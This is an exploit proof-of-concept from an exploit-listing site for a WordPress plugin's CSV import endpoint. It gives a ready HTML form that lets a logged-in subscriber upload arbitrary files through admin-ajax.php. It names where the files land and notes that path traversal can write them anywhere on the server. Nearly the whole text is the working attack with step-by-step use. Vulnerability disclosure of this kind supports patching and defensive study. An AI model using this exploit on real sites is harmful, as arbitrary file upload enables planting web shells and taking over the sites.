## https://sploitus.com/exploit?id=WPEX-ID:696868F7-409D-422D-87F4-92FC6BF6E74E
As a subscriber, open the HTML code below while being logged in as a subscriber, then choose a file to upload and submit it
<form action="https://example.com/wp-admin/admin-ajax.php?action=afcsp_upload_csv" method="POST" enctype="multipart/form-data">
<input type="file" name="afcsp_import_file" value="File to upload">
<input type="submit" name="submit" value="submit">
</form>
The file will be uploaded at https://example.com/wp-content/uploads/addify-role-pricing/ and have the same name than the original (path can also be found in the upload response). Path traversal vector could also be used to upload the file anywhere